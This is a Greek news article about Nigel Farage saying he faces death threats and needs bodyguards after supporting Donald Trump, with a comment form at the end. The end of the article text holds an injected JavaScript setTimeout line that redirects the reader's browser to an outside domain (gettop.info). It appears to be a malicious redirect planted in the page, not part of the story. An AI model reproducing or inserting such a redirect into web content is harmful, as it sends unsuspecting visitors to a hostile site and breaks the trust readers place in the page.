Φοβάται για τη ζωή του λόγω… Τραμπ ο Νάιτζελ Φάρατζ

0
5

 

Η στήριξη που παρείχε στον Ντόναλντ Τραμπ στις προεδρικές εκλογές των ΗΠΑ δεν του βγήκε σε καλό του Νάιτζελ Φάρατζ καθώς, όπως δήλωσε στην Daily Express, πλέον δέχεται νέες απειλές κατά της ζωής του. Μάλιστα, επεσήμανε ότι δεν κυκλοφορεί χωρίς σωματοφύλακες.

Υπενθυμίζεται ότι μόλις εξελέγη ο Τραμπ πρότεινε στη Βρετανία να κανει πρέσβη της στις ΗΠΑ τον Νάιτζελ Φάρατζ, ο οποίος σημειωτέον ήταν ο πρώτος Βρετανός που τον συνάντησε και είχε συζήτηση μαζί του στον Πύργο Τραμπ στη Νέα Υόρκη.

«Σίγουρα δεν θα έβγαινα έξω στο Λονδίνο για κάποιο βράδυ χωρίς την ασφάλειά μου. Δεν θα το σκεφτόμουν καν. Δεν μπορώ ούτε να περπατήσω στον δρόμο χωρίς σωματοφύλακες. Πρέπει να πηγαίνω σε ιδιωτικά μέρη», δήλωσε ο Φάρατζ, επισημαίνοντας επιπλέον ότι μετά τη στήριξή του στο πρόσωπο του Τραμπ άλλαξαν τα πάντα ενώ ενισχύθηκε το κύμα απειλών και εχθρότητας εναντίον του.

Ωστόσο παραμένει αμετανόητος καθώς επιπλέον δήλωσε ότι υπάρχει ενδεχόμενο να υποστηρίξει και τη Μαρίν Λεπέν, στις γαλλικές προεδρικές εκλογές. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here